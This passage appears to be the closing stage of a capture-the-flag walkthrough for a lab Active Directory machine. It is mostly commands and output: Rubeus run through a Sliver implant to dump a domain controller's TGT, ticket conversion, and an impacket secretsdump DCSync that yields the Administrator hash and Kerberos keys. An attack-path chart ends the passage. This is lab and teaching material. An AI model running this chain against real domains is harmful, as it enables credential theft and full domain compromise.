Action: Triage Kerberos Tickets (All Users)
[*] Current LUID : 0x3e7
----------------------------------------------------------------------------------------------------------
| LUID | UserName | Service | EndTime |
----------------------------------------------------------------------------------------------------------
| 0x1730ca | DC01$ @ DARKZERO.HTB | krbtgt/DARKZERO.HTB | 11/18/2025 11:50:38 PM |
| 0x7b33d | DC02$ @ DARKZERO.EXT | LDAP/DC02.darkzero.ext/darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x7b294 | DC02$ @ DARKZERO.EXT | ldap/DC02.darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x7b1f1 | DC02$ @ DARKZERO.EXT | ldap/DC02.darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x73b81 | Administrator @ DARKZERO.EXT | krbtgt/DARKZERO.EXT | 11/18/2025 11:56:35 PM |
| 0x608af | DC02$ @ DARKZERO.EXT | krbtgt/DARKZERO.EXT | 11/18/2025 11:51:41 PM |
| 0x5a585 | DC02$ @ DARKZERO.EXT | ldap/DC02.darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x3e4 | dc02$ @ DARKZERO.EXT | krbtgt/DARKZERO.EXT | 11/19/2025 12:51:13 AM |
| 0x3e4 | dc02$ @ DARKZERO.EXT | DNS/dc02.darkzero.ext | 11/19/2025 12:51:13 AM |
| 0x14b8ea | Administrator @ DARKZERO.EXT | krbtgt/DARKZERO.EXT | 11/19/2025 1:35:20 AM |
| 0x111f1c | Administrator @ DARKZERO.EXT | krbtgt/DARKZERO.EXT | 11/19/2025 1:05:20 AM |
| 0xa5f0d | DC02$ @ DARKZERO.EXT | GC/DC02.darkzero.ext/darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x7bcc7 | DC02$ @ DARKZERO.EXT | ldap/DC02.darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x612be | svc_sql @ DARKZERO.EXT | krbtgt/DARKZERO.EXT | 11/18/2025 11:53:17 PM |
| 0x5bf5c | DC02$ @ DARKZERO.EXT | LDAP/DC02.darkzero.ext/darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | krbtgt/DARKZERO.HTB | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | GC/DC02.darkzero.ext/darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | ldap/dc01.darkzero.htb/darkzero.htb | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | cifs/DC02 | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | DC02$ | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | cifs/DC02.darkzero.ext/darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | LDAP/DC02.darkzero.ext/darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | ldap/DC02.darkzero.ext | 11/18/2025 11:51:41 PM |
| 0x3e7 | dc02$ @ DARKZERO.EXT | LDAP/DC02 | 11/18/2025 11:51:41 PM |
----------------------------------------------------------------------------------------------------------
sliver (darkzero) > rubeus -- dump /nowrap /user:DC01$
[*] rubeus output:
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
Action: Dump Kerberos Ticket Data (All Users)
[*] Target user : DC01$
[*] Current LUID : 0x3e7
UserName : DC01$
Domain : darkzero
LogonId : 0x1730ca
UserSID : S-1-5-21-1152179935-589108180-1989892463-1000
AuthenticationPackage : Kerberos
LogonType : Network
LogonTime : 11/18/2025 3:55:43 PM
LogonServer :
LogonServerDNSDomain : DARKZERO.HTB
UserPrincipalName :
ServiceName : krbtgt/DARKZERO.HTB
ServiceRealm : DARKZERO.HTB
UserName : DC01$ (NT_PRINCIPAL)
UserRealm : DARKZERO.HTB
StartTime : 11/18/2025 1:50:39 PM
EndTime : 11/18/2025 11:50:38 PM
RenewTill : 11/25/2025 1:50:38 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : 2zwQkxl1UNmMoa/tVQ5+qBtIi9Xo+jGtSJYIGSMtITA=
Base64EncodedTicket :
<SNIP>
What's left is to base64-decode the dumped ticket into a .kirbi file, convert it into a ccache with ticketConverter, and use the TGT of DC01$ to DCSync the hash of the Administrator account from DC01 (a domain controller's machine account holds the replication rights DCSync needs). With that hash I can then get an interactive session on DC01.
$ cat ticket.b64
doIFjDCCBYigAwIBBaE<SNIP>
$ base64 -d ticket.b64 > ticket.kirbi
$ impacket-ticketConverter ticket.kirbi ticket.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
$ export KRB5CCNAME=ticket.ccache
$ faketime -f +7h impacket-secretsdump -k \
-no-pass \
-just-dc-user Administrator \
dc01.darkzero.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::
[*] Kerberos keys grabbed
Administrator:0x14:2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd
Administrator:0x13:a23315d970fe9d556be03ab611730673
Administrator:aes256-cts-hmac-sha1-96:d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd
Administrator:aes128-cts-hmac-sha1-96:b1e04b87abab7be2c600fc652ac84362
Administrator:0x17:5917507bdf2ef2c2b0a869a1cba40726
[*] Cleaning up...
Attack Path
flowchart TD
    subgraph "Privilege Escalation"
        A(Access as john.w) -->|Use Linked MSSQL Server| B(Sysadmin in MSSQL on DC02)
        B -->|xp_cmdshell| C(Shell as svc_sql)
        C -->|Reset password through ADCS| D(Known password)
        D -->|"Perform Service Login (Logon Type 5)"| E(Shell as svc_sql with SeImpersonate)
        E --> F(Shell as SYSTEM on DC02)
        A & F -->|Coerce DC01 and dump TGT from memory| G(TGT for DC01$)
        G -->|secretsdump| H(Shell as Administrator on DC01)
    end
